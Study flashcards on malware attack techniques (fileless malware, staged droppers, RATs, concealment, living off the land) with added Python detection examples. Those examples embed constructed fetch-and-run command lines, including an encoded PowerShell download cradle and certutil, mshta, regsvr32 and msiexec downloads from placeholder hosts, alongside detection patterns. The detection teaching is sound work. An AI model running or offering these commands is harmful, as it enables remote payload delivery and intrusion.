Section 6.57 Malware Attack Techniques Flashcards

Objective 2.4: Given a scenario, analyse indicators of malicious activity

1
Q

Method of attack: Think modern

Malware Attack Techniques

A

The specific method by which malware code penetrates and infects a targeted system.

■ Much modern malware uses fileless techniques to evade signature-based security software, which relies on recognising known malicious files on disk.
■ Fileless malware runs its malicious code from the system's memory (RAM), typically by abusing trusted built-in tools, so that little or nothing is written to disk for a scanner to inspect.

PowerShell exploitation: PowerShell is commonly abused by fileless malware because it can carry out complex operations without ever writing an executable to disk. It is usually used to download a payload and run it directly in memory, and the process is typically launched with switches that bypass the execution policy (which restricts which scripts may run, but is a safety setting rather than a security boundary) and hide the console window.
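As an added example that is not part of the course material, the Python below turns the card into a concrete check: it decodes a PowerShell -EncodedCommand argument (Base64 over the UTF-16LE script text, which is how PowerShell expects it) and scans both the raw command line and the decoded script for the fileless indicators described above. The sample command line is constructed for the example, the regular expressions are illustrative rather than a complete rule set, and the two-indicator threshold is an assumption.

```python
import base64
import re

# Added example: indicators of fileless PowerShell use. The patterns are
# illustrative, not a complete rule set.
ENCODED_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)
INDICATORS = [
    ("execution_policy_bypass", re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("encoded_command", ENCODED_RE),
    ("download_cradle", re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)),
    ("in_memory_execution", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
]


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (or -enc/-ec), else None.
    PowerShell expects Base64 over the UTF-16LE bytes of the script, so a value
    that is not valid Base64 or has an odd byte count is not an encoded command."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_powershell_commandline(cmdline):
    """Scan a PowerShell command line, plus any decoded script, for the indicators.
    The decoded text is included because the download cradle usually hides there.
    The two-indicator threshold is an assumption for the example."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    return {"decoded": decoded, "indicators": hits, "suspicious": len(hits) >= 2}


# Constructed download cradle (not from a real incident); example.invalid is a
# reserved placeholder domain.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"


def build_sample():
    """Build a constructed malicious command line, encoded the way -EncodedCommand expects."""
    encoded = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc {encoded}"


# Constructed benign line: a scheduled backup script run from disk.
BENIGN = "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"

if __name__ == "__main__":
    for line in (build_sample(), BENIGN):
        print(analyze_powershell_commandline(line))
```

The benign line trips only the -NoProfile pattern, which is why a single indicator is not treated as suspicious on its own; the malicious line trips every pattern once the encoded script is decoded, which is the step a purely string-matching signature misses.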

2
Q

Stage 1 Dropper or Downloader

A

When a user is tricked into clicking a malicious link or opening a malicious file, the first piece of malware that runs is known as a stage one dropper or downloader.

The primary function of a stage one dropper or downloader is to retrieve the remaining portions of the malware code and get them running, in some cases by tricking the user into activating them.

This piece of malware is usually created as lightweight shellcode that can be executed on the given system.

3
Q

Dropper

A

A malware component that carries another piece of malware inside its own payload and whose job is to install or run that malware on the infected host

4
Q

Downloader

A

Retrieves additional tools or malware components from a remote server after the dropper has completed the initial infection

5
Q

Shellcode

A

A small, self-contained piece of machine code that an exploit delivers to and executes on a target; named for its original purpose of spawning a command shell, although modern shellcode is often just a loader for further stages

6
Q

Stage 2: Downloader

A

Downloads and installs a remote access Trojan (RAT), which gives the threat actor command and control (C2) over the victimised system; the RAT calls back to the attacker's C2 infrastructure for instructions

7
Q

“Actions on Objectives” Phase

A

Once access is established, threat actors carry out the actions that meet their core objectives, such as:

■ Data exfiltration
■ File encryption (ransomware)

8
Q

Concealment

A

Techniques used to help the threat actor prolong unauthorised access to a system by:

■ Hiding their tracks
■ Erasing log files
■ Hiding any other evidence of malicious activity

A cleared event log is itself an indicator: the clearing is usually recorded as an event of its own, and logs that have already been forwarded to a central collector cannot be erased from the host.
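The cards from the stage one dropper through to concealment describe one staged chain. As an added example that is not part of the course material, the Python below correlates a constructed host timeline against that chain: each telemetry event is mapped to a stage (a document viewer spawning a script host, a script host fetching from the network, persistence or regular beaconing for the RAT, mass file renames or bulk upload for actions on objectives, a cleared log for concealment), and the host is flagged only when the dropper signal is followed, in order, by at least two later stages. The event fields, the thresholds and image names such as svchost_upd.exe are assumptions made for the example; the 203.0.113.0/24 address is a documentation-range placeholder.

```python
# Added example: correlate host telemetry against the staged chain in the cards
# (dropper, downloader, stage 2 RAT, actions on objectives, concealment).
# Event fields, thresholds and image names are assumptions for the example.

DOC_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}
# Kill-chain stages in the order the cards describe them.
STAGES = ["stage1_dropper", "downloader", "stage2_rat",
          "actions_on_objectives", "concealment"]


def classify(ev):
    """Map one telemetry event to a stage, or None if it proves nothing alone."""
    kind = ev["type"]
    image = ev.get("image", "").lower()
    if kind == "process":
        parent = ev.get("parent", "").lower()
        cmd = ev.get("cmdline", "").lower()
        # A document viewer spawning a script host is the classic macro/dropper signal.
        if parent in DOC_APPS and image in SCRIPT_HOSTS:
            return "stage1_dropper"
        if "wevtutil cl" in cmd or "clear-eventlog" in cmd:
            return "concealment"
    elif kind == "network":
        if ev.get("bytes_out", 0) >= 100_000_000:     # bulk upload: exfiltration
            return "actions_on_objectives"
        if ev.get("beacon_count", 0) >= 10:           # regular call-backs: C2 channel
            return "stage2_rat"
        if image in SCRIPT_HOSTS:                      # script host fetching content
            return "downloader"
    elif kind == "persistence":                        # task/service/run key created
        return "stage2_rat"
    elif kind == "file" and ev.get("renamed", 0) >= 500:  # mass rename: encryption
        return "actions_on_objectives"
    elif kind == "log_cleared":
        return "concealment"
    return None


def correlate(events):
    """Order the host's events, record when each stage first appears, and decide
    whether the stages line up as a staged infection rather than isolated noise."""
    first_seen = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = classify(ev)
        if stage and stage not in first_seen:
            first_seen[stage] = ev["ts"]
    seen = [s for s in STAGES if s in first_seen]
    times = [first_seen[s] for s in seen]
    ordered = times == sorted(times)
    # Require the dropper plus at least two later stages, in chain order.
    verdict = ("staged_infection"
               if ordered and "stage1_dropper" in seen and len(seen) >= 3
               else "insufficient")
    return {"stages": seen, "ordered": ordered, "verdict": verdict}


# Constructed timeline (ts in seconds from an arbitrary origin); svchost_upd.exe
# is a hypothetical name for the dropped remote access Trojan.
SAMPLE_TIMELINE = [
    {"ts": 100, "type": "process", "image": "WINWORD.EXE", "parent": "explorer.exe",
     "cmdline": "winword.exe invoice.docm"},
    {"ts": 105, "type": "process", "image": "powershell.exe", "parent": "WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass"},
    {"ts": 106, "type": "network", "image": "powershell.exe",
     "dest": "203.0.113.10:443", "bytes_out": 1200},
    {"ts": 110, "type": "persistence", "image": "svchost_upd.exe",
     "detail": "scheduled task created, runs every 5 minutes"},
    {"ts": 120, "type": "network", "image": "svchost_upd.exe",
     "dest": "203.0.113.10:443", "bytes_out": 300, "beacon_count": 48},
    {"ts": 3700, "type": "file", "image": "svchost_upd.exe", "renamed": 4200},
    {"ts": 3900, "type": "log_cleared", "image": "wevtutil.exe",
     "detail": "Security log cleared"},
]

# Constructed benign activity: an admin shell that pulls a file and clears a
# log after maintenance. Two stages appear, but no dropper signal precedes them.
BENIGN_TIMELINE = [
    {"ts": 10, "type": "process", "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": "powershell.exe"},
    {"ts": 20, "type": "network", "image": "powershell.exe",
     "dest": "10.0.0.5:443", "bytes_out": 900},
    {"ts": 30, "type": "process", "image": "wevtutil.exe", "parent": "powershell.exe",
     "cmdline": "wevtutil cl Application"},
]

if __name__ == "__main__":
    print(correlate(SAMPLE_TIMELINE))
    print(correlate(BENIGN_TIMELINE))
```

The benign timeline shows why the ordering matters: a script host reaching the network and a cleared log both match a stage, but without the dropper signal ahead of them the verdict stays "insufficient", which is the behaviour you want from a rule that would otherwise page on routine administration.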

9
Q

“Living off the Land”

A

■ A strategy adopted by many Advanced Persistent Threats (APTs) and criminal organisations

■ Rather than introducing new malicious files, the threat actors abuse the standard tools already present on the system (often called "living off the land binaries", or LOLBins), such as PowerShell, WMI and other signed administrative utilities, to perform the intrusion, so that their activity blends in with legitimate administration and leaves fewer artifacts for signature-based tools to find
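As an added example that is not part of the course material, the Python below generalises the PowerShell case to other built-in Windows tools: it takes a process command line, identifies the image (handling a quoted path and a missing .exe suffix), and matches it against a small set of argument patterns typical of living-off-the-land abuse, such as a download through certutil or a remote scriptlet loaded through regsvr32. The rule list is an illustrative subset rather than a complete one, the sample command lines are constructed, and the 203.0.113.0/24 addresses are documentation-range placeholders.

```python
import re

# Added example rule set: trusted Windows binaries paired with argument patterns
# that are typical of living-off-the-land abuse. Illustrative, not exhaustive.
LOLBIN_RULES = [
    ("certutil.exe", re.compile(r"-urlcache\b.*\s-f\b|\s-decode\b", re.I),
     "download or decode a payload"),
    ("mshta.exe", re.compile(r"https?://|javascript:|vbscript:", re.I),
     "run a remote or inline script"),
    ("regsvr32.exe", re.compile(r"/i:\s*https?://|scrobj\.dll", re.I),
     "load a remote scriptlet through a signed binary"),
    ("rundll32.exe", re.compile(r"javascript:|url\.dll", re.I),
     "execute script or fetch content through a system DLL"),
    ("bitsadmin.exe", re.compile(r"/transfer\b", re.I),
     "download a file with the BITS service"),
    ("wmic.exe", re.compile(r"process\s+call\s+create|/node:", re.I),
     "launch a process, possibly on a remote host"),
    ("msiexec.exe", re.compile(r"/i\s+https?://", re.I),
     "install a package fetched from a URL"),
    ("schtasks.exe", re.compile(r"/create\b", re.I),
     "create a scheduled task (persistence)"),
]

# First token of the command line, quoted (may contain spaces) or bare.
IMAGE_RE = re.compile(r'^\s*(?:"([^"]+)"|(\S+))')


def image_name(cmdline):
    """Extract the executable name from a command line, handling a quoted path
    and a missing .exe suffix so the rule lookup is by bare binary name."""
    m = IMAGE_RE.match(cmdline)
    if not m:
        return ""
    path = m.group(1) or m.group(2)
    name = re.split(r"[\\/]", path)[-1].lower()
    return name if name.endswith(".exe") else name + ".exe"


def detect_lolbin(cmdline):
    """Return (binary, what it indicates) when a built-in tool is invoked with
    arguments matching a rule, or None for ordinary administrative use."""
    image = image_name(cmdline)
    for binary, pattern, what in LOLBIN_RULES:
        if image == binary and pattern.search(cmdline):
            return binary, what
    return None


def scan_command_lines(lines):
    """Run every rule over a batch of process command lines and collect hits."""
    findings = []
    for line in lines:
        hit = detect_lolbin(line)
        if hit:
            findings.append({"cmdline": line, "binary": hit[0], "indicates": hit[1]})
    return findings


# Constructed process-creation command lines (not captured from a real host);
# 203.0.113.0/24 is a documentation range used as a placeholder.
SAMPLE_COMMAND_LINES = [
    r'certutil.exe -urlcache -split -f http://203.0.113.7/a.txt C:\Users\Public\a.txt',
    r'"C:\Windows\System32\mshta.exe" http://203.0.113.7/p.hta',
    r'regsvr32 /s /n /u /i:http://203.0.113.7/x.sct scrobj.dll',
    r'certutil -hashfile C:\tools\setup.msi SHA256',
    r'bitsadmin /list',
    r'wmic process call create "cmd.exe /c whoami"',
    r'msiexec /q /i http://203.0.113.7/pkg.msi',
]

if __name__ == "__main__":
    for f in scan_command_lines(SAMPLE_COMMAND_LINES):
        print(f"{f['binary']}: {f['indicates']}  <- {f['cmdline']}")
```

The two certutil lines make the point of the card: the binary is identical and legitimately signed in both cases, so only the argument pattern (a URL fetch versus a file hash) separates abuse from ordinary use, which is why blocking or alerting on the binary name alone does not work.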
